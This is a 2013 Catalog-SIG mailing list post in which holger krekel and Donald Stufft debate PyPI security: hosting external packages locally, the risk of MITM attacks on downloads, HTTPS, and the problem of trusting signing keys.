[Catalog-sig] Use user-specific site-packages by default?
holger krekel
holger at merlinux.eu
Tue Feb 5 16:41:15 CET 2013
On Tue, Feb 05, 2013 at 10:18 -0500, Donald Stufft wrote:
> On Tuesday, February 5, 2013 at 10:14 AM, holger krekel wrote:
> > Transporting almost all externally reachable packages to be locally pypi
> > served is also kind of a low hanging fruit, although probably slightly
> > higher hanging than SSL :) The point is that we can have some control over
> > those packages once we have them - so we can delete them if they are reported
> > to be malicious independently of maintainer reachability.
> >
>
> We have no way to validate the package we are downloading is the accurate one,
> we should not infer trust/validation that doesn't exist.
MITM attacking any of the many world-wide pypi/easy_install downloads
from external sites is much easier than tampering a few one-time
downloads (verified against each other) for pypi.python.org's
serving purposes. By contrast, changing client-side tools and
defaults is going to take much longer and will not reach everybody.
IOW, i believe that improving the serving side good low hanging
fruit.
> > No, because a signature can only be created by the original author for
> > a particular file (his upload), not from the download site or a
> > MITM-attacker for a different file.
> >
> >
>
> This assumes we know what the correct key is. If we don't then we
> have no way to validate that the signature was created by the author
> and not by someone else. Trust is hard.
Sure, you need sig-validation infrastructure for this.
And Sig-validation is a much higher hanging fruit than using
https on pypi.python.org.
best,
holger
> >
> > best,
> > holger
> >
> >
> > > //Lennart
> > > _______________________________________________
> > > Catalog-SIG mailing list
> > > Catalog-SIG at python.org (mailto:Catalog-SIG at python.org)
> > > http://mail.python.org/mailman/listinfo/catalog-sig
> > >
> >
> > _______________________________________________
> > Catalog-SIG mailing list
> > Catalog-SIG at python.org (mailto:Catalog-SIG at python.org)
> > http://mail.python.org/mailman/listinfo/catalog-sig
> >
> >
>
>
More information about the Catalog-SIG
mailing list